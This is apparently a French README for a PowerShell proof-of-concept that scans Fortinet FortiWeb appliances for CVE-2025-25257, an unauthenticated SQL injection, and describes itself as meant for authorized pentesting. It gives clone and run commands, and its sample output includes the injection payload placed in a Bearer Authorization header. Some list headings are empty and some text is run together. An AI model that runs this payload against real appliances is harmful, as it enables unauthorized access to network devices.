
PoC CVE-2025-25257 à usage éducatif et/ou tests d'intrusion autorisés.
Ce script PowerShell est conçu uniquement à des fins de tests de pénétration autorisés. Il teste les appliances Fortinet FortiWeb pour CVE-2025-25257, une vulnérabilité d'injection SQL non authentifiée dans le point de terminaison /api/fabric/device/status.
Le script :
Avertissement important :
Cet outil est destiné uniquement à un usage éthique et autorisé dans le cadre de tests de pénétration ou d'évaluations de vulnérabilités. Toute utilisation non autorisée peut enfreindre des lois telles que le Computer Fraud and Abuse Act (CFAA) ou les réglementations équivalentes dans votre juridiction. Assurez-vous d'avoir l'autorisation explicite du propriétaire de la cible avant d'exécuter ce script. L'auteur décline toute responsabilité en cas d'utilisation abusive.
Invoke-WebRequest intégré.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
Le script se trouve dans script.ps1.
Exécutez le script depuis PowerShell avec l'une des options suivantes :
Spécifiez une seule adresse IP ou un nom DNS, éventuellement avec un port (par ex., 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
Ou sans port (scanne les ports par défaut) :
.\script.ps1 -Target "example.com"
Fournissez un fichier texte avec une cible par ligne (par ex., targets.txt).
.\script.ps1 -InputFile "targets.txt"
Exemple de contenu de targets.txt :
192.168.1.1:443
example.com
10.0.0.1
Le script affichera les résultats pour chaque cible et port, y compris :
Exemple de résultat :
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization (Bearer AAAAAA'or'1'='1).Les contributions sont les bienvenues ! Veuillez forker le dépôt et soumettre une pull request avec des améliorations, des corrections de bugs ou des fonctionnalités supplémentaires.
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Pour toute question ou problème, ouvrez un ticket GitHub.